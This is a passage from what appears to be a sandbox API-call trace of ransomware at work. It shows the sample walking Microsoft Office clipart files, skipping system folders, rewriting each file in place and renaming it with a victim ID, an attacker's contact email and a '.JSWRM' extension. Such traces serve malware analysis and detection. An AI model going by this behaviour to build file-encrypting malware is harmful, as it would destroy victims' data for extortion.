RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0097.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0097.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0097.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0097.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0097.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.369] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02028_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02028_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02028_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02028_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0097.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0097.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0097.370] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x266c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02045_.WMF", cAlternateFileName="")) returned 1 [0097.370] lstrcmpiW (lpString1="SO02045_.WMF", lpString2=".") returned 1 [0097.370] lstrcmpiW (lpString1="SO02045_.WMF", lpString2="..") returned 1 [0097.370] lstrcmpiW (lpString1="SO02045_.WMF", lpString2="...") returned 1 [0097.370] lstrcmpiW (lpString1="SO02045_.WMF", lpString2="windows") returned -1 [0097.370] lstrcmpiW (lpString1="SO02045_.WMF", lpString2="recovery") returned 1 [0097.370] lstrcmpiW (lpString1="SO02045_.WMF", lpString2="perflogs") returned 1 [0097.370] lstrcmpiW (lpString1="SO02045_.WMF", lpString2="documents and settings") returned 1 [0097.370] lstrcmpiW (lpString1="SO02045_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.370] lstrcmpiW (lpString1="SO02045_.WMF", lpString2="system volume information") returned -1 [0097.370] lstrcmpiW (lpString1="SO02045_.WMF", lpString2="msocache") returned 1 [0097.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0097.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02045_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02045_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02045_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0097.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0097.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02045_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02045_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02045_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0097.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0097.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0097.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0097.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02045_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.371] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9836) returned 1 [0097.371] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2660) returned 0x24d210 [0097.371] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2660, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2660, lpOverlapped=0x0) returned 1 [0097.373] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.373] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2660, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2660, lpOverlapped=0x0) returned 1 [0097.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.373] CloseHandle (hObject=0x314) returned 1 [0097.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0097.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0097.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0097.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0097.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0097.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0097.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.374] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02045_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02045_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0097.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0097.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0097.374] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1fde, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02048_.WMF", cAlternateFileName="")) returned 1 [0097.374] lstrcmpiW (lpString1="SO02048_.WMF", lpString2=".") returned 1 [0097.374] lstrcmpiW (lpString1="SO02048_.WMF", lpString2="..") returned 1 [0097.375] lstrcmpiW (lpString1="SO02048_.WMF", lpString2="...") returned 1 [0097.375] lstrcmpiW (lpString1="SO02048_.WMF", lpString2="windows") returned -1 [0097.375] lstrcmpiW (lpString1="SO02048_.WMF", lpString2="recovery") returned 1 [0097.375] lstrcmpiW (lpString1="SO02048_.WMF", lpString2="perflogs") returned 1 [0097.375] lstrcmpiW (lpString1="SO02048_.WMF", lpString2="documents and settings") returned 1 [0097.375] lstrcmpiW (lpString1="SO02048_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.375] lstrcmpiW (lpString1="SO02048_.WMF", lpString2="system volume information") returned -1 [0097.375] lstrcmpiW (lpString1="SO02048_.WMF", lpString2="msocache") returned 1 [0097.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0097.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02048_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02048_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02048_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0097.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0097.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02048_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02048_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02048_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0097.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0097.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0097.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0097.375] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02048_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02048_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.376] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8158) returned 1 [0097.376] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1fd0) returned 0x205850 [0097.376] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1fd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1fd0, lpOverlapped=0x0) returned 1 [0097.378] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.378] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1fd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1fd0, lpOverlapped=0x0) returned 1 [0097.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0097.378] CloseHandle (hObject=0x314) returned 1 [0097.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0097.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0097.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0097.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0097.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0097.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0097.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.379] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02048_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02048_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02048_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02048_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0097.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0097.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0097.380] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2c2c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02051_.WMF", cAlternateFileName="")) returned 1 [0097.380] lstrcmpiW (lpString1="SO02051_.WMF", lpString2=".") returned 1 [0097.380] lstrcmpiW (lpString1="SO02051_.WMF", lpString2="..") returned 1 [0097.380] lstrcmpiW (lpString1="SO02051_.WMF", lpString2="...") returned 1 [0097.380] lstrcmpiW (lpString1="SO02051_.WMF", lpString2="windows") returned -1 [0097.380] lstrcmpiW (lpString1="SO02051_.WMF", lpString2="recovery") returned 1 [0097.380] lstrcmpiW (lpString1="SO02051_.WMF", lpString2="perflogs") returned 1 [0097.380] lstrcmpiW (lpString1="SO02051_.WMF", lpString2="documents and settings") returned 1 [0097.380] lstrcmpiW (lpString1="SO02051_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.380] lstrcmpiW (lpString1="SO02051_.WMF", lpString2="system volume information") returned -1 [0097.380] lstrcmpiW (lpString1="SO02051_.WMF", lpString2="msocache") returned 1 [0097.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0097.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02051_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02051_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02051_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0097.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0097.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02051_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02051_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02051_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0097.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0097.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0097.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0097.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02051_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02051_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.381] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11308) returned 1 [0097.381] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c20) returned 0x24d210 [0097.381] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2c20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2c20, lpOverlapped=0x0) returned 1 [0097.383] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.383] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2c20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2c20, lpOverlapped=0x0) returned 1 [0097.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.383] CloseHandle (hObject=0x314) returned 1 [0097.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0097.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0097.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0097.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0097.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0097.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0097.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0097.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0097.384] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02051_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02051_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02051_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02051_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0097.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0097.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0097.385] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30ca, dwReserved0=0x60002, 